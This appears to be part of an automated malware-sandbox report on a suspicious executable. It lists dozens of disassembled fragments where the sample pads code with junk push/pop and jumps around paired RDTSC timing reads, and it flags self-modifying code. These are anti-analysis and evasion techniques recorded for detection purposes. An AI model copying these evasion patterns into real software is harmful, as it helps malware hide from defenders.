                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14296B7 second address: 14296D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAE903A966h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jno 00007FFAE903A966h 0x00000015 pushad 0x00000016 popad 0x00000017 jnc 00007FFAE903A966h 0x0000001d popad 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14296D8 second address: 14296DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14299C4 second address: 14299E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A976h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14299E3 second address: 14299E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14299E9 second address: 14299ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14299ED second address: 14299F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14299F1 second address: 1429A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A96Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FFAE903A979h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFAE903A96Fh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1429A32 second address: 1429A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432E50 second address: 1432E72 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFAE903A966h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FFAE903A968h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FFAE903A96Bh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432E72 second address: 1432E79 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14310B7 second address: 14310BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14310BB second address: 14310E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFAE9061D73h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14310E4 second address: 14310E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143120E second address: 1431212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431212 second address: 143122C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FFAE903A972h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14314CF second address: 14314D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14314D5 second address: 14314DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14314DF second address: 14314E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431671 second address: 143167B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 143167B second address: 143167F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 143167F second address: 1431685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14317FE second address: 1431812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAE9061D6Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431812 second address: 1431825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FFAE903A966h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431825 second address: 1431839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007FFAE9061D6Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431E88 second address: 1431E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAE903A96Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431E98 second address: 1431EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1431EA1 second address: 1431EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1436185 second address: 14361AC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAE9061D70h 0x0000000b push edx 0x0000000c jmp 00007FFAE9061D6Dh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14361AC second address: 14361B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144152C second address: 144153D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144153D second address: 1441541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1441541 second address: 1441547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1441547 second address: 1441576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAE903A971h 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FFAE903A971h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1441576 second address: 144157C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1448AE9 second address: 1448AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14484FC second address: 1448513 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFAE9061D6Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1448513 second address: 1448521 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FFAE903A96Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144865C second address: 1448660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144CDE2 second address: 144CDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144CDEF second address: 144CDFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FFAE9061D68h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1376447 second address: 137644D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137644D second address: 1376453 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1376453 second address: 137645F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137645F second address: 1376463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1376463 second address: 1376481 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007FFAE903A96Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FFAE903A966h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1457317 second address: 145731C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 145D618 second address: 145D63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A973h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jc 00007FFAE903A97Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 145D63A second address: 145D64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 145D4CA second address: 145D4D4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFAE903A966h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 145D4D4 second address: 145D4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 145D4DA second address: 145D4E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007FFAE903A966h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1465A39 second address: 1465A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1465A3D second address: 1465A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FFAE903A966h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f jmp 00007FFAE903A96Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1464735 second address: 1464739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1464739 second address: 146473F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14648B1 second address: 14648B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14648B7 second address: 14648BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14648BE second address: 14648F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FFAE9061D78h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAE9061D72h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14648F7 second address: 14648FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14648FB second address: 146492D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FFAE9061D8Ch 0x0000000c jmp 00007FFAE9061D75h 0x00000011 jmp 00007FFAE9061D71h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 146492D second address: 1464939 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1464939 second address: 146493D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1464AAC second address: 1464ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jc 00007FFAE903A966h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1464DA7 second address: 1464DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFAE9061D76h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1464DC6 second address: 1464DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1468220 second address: 1468241 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAE9061D79h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 146AFE1 second address: 146AFFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A970h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop esi 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 146AFFE second address: 146B00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 146AB92 second address: 146AB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAE903A966h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14790A2 second address: 14790E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFAE9061D66h 0x0000000a popad 0x0000000b jmp 00007FFAE9061D76h 0x00000010 pop esi 0x00000011 pushad 0x00000012 jnl 00007FFAE9061D68h 0x00000018 jmp 00007FFAE9061D74h 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007FFAE9061D66h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14790E9 second address: 14790ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1476317 second address: 1476338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE9061D76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14887BB second address: 14887D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A973h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14887D2 second address: 14887D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14884E1 second address: 14884EE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 149768C second address: 14976A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FFAE9061D66h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAE9061D6Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14976A9 second address: 14976B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAE903A966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14976B7 second address: 14976BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14976BB second address: 14976C9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FFAE903A96Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14976C9 second address: 14976E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAE9061D78h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1497941 second address: 149794E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1499B81 second address: 1499B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 149C5F5 second address: 149C5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 149C5FA second address: 149C617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE9061D73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 149C668 second address: 149C687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FFAE903A966h 0x00000009 ja 00007FFAE903A966h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push ebx 0x00000015 jne 00007FFAE903A966h 0x0000001b pop ebx 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 149C687 second address: 149C6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 adc dl, FFFFFFA1h 0x0000000a push 00000004h 0x0000000c sub dword ptr [ebp+122D1EDFh], edi 0x00000012 call 00007FFAE9061D69h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FFAE9061D6Ch 0x0000001f jnp 00007FFAE9061D66h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 149C6B0 second address: 149C6B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 149C6B5 second address: 149C6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FFAE9061D77h 0x00000010 jmp 00007FFAE9061D71h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 149C6D6 second address: 149C6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 149C6DC second address: 149C6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F801E8 second address: F80229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A971h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAE903A96Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 mov eax, ebx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FFAE903A972h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F802A3 second address: F802B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE9061D6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F802B2 second address: F8034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007FFAE903A96Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FFAE903A974h 0x00000016 sub cl, FFFFFFD8h 0x00000019 jmp 00007FFAE903A96Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FFAE903A978h 0x00000025 sbb ch, 00000038h 0x00000028 jmp 00007FFAE903A96Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 mov al, DBh 0x00000034 movsx ebx, ax 0x00000037 popad 0x00000038 pop ebp 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FFAE903A976h 0x00000040 sub ah, FFFFFFC8h 0x00000043 jmp 00007FFAE903A96Bh 0x00000048 popfd 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c pop edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1201A78 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13ADDE5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13B7FCC instructions caused by: Self-modifying code
